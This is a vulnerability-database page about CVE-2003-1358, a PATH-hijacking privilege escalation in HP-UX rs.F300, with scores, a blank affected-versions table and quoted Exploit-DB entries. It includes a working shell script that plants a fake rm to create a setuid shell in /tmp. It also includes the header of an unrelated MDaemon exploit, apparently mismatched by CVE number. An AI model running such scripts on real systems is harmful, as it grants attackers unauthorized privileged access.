CVE-2003-1358
published 2003-12-31CVE-2003-1358: rs.F300 for HP-UX 10.0 through 11.22 uses the PATH environment variable to find and execute programs such as rm while operating at raised privileges, which…
PriorityP424high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
0.95%
56.9th percentile
rs.F300 for HP-UX 10.0 through 11.22 uses the PATH environment variable to find and execute programs such as rm while operating at raised privileges, which allows local users to gain privileges by modifying the path to point to a malicious rm program.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
exploitdb·2008-03-13
CVE-2008-1358 Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
---
#!/usr/bin/python
###############################################################################
#
# MDAEMON (POST AUTH) REMOTE R00T IMAP FETCH COMMAND UNIVERSAL EXPLOIT 0day
# Bug discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : MDaemon IMAP server v9.6.4
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#-----------------------------------------------------------------------------
#
# muts AS YOU CAN SEE, I ALWAYS MAINTAIN MY PROMISES! LOL
#
# Thx to Silvia for feeding my obsessions
# Thx to didNot at #offsec
# (yes he doesn't look like Silvia but he's a
Exploit-DB
HP-UX 10.x - rs.F3000 Unauthorized Access
exploitdb·2003-02-12
CVE-2003-1358 HP-UX 10.x - rs.F3000 Unauthorized Access
HP-UX 10.x - rs.F3000 Unauthorized Access
---
source: https://www.securityfocus.com/bid/6837/info
The rs.F3000 binary is prone to an issue that may allow attackers to obtain unauthorized access to a vulnerable system. A denial of service attack is also possible. This is due to multiple instances of the system() function being used in an unsafe manner.
#!/bin/sh
## copyright LAST STAGE OF DELIRIUM may 2002 poland *://lsd-pl.net/ #
## /usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000 #
echo "copyright LAST STAGE OF DELIRIUM may 2002 poland //lsd-pl.net/"
echo "/usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000 for HP-UX 10.20 700/800"
cat > /tmp/rm << 'EOF'
/usr/bin/cp /bin/sh /tmp/sh
/usr/bin/chown daemon /tmp/sh
/usr/bin/chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/rm
PATH=/tmp:$PATH
export PATH
http://securityreason.com/securityalert/3236http://www.securityfocus.com/advisories/4960http://www.securityfocus.com/archive/1/324381http://www.securityfocus.com/bid/6837https://exchange.xforce.ibmcloud.com/vulnerabilities/11312http://securityreason.com/securityalert/3236http://www.securityfocus.com/advisories/4960http://www.securityfocus.com/archive/1/324381http://www.securityfocus.com/bid/6837https://exchange.xforce.ibmcloud.com/vulnerabilities/11312
2003-12-31
Published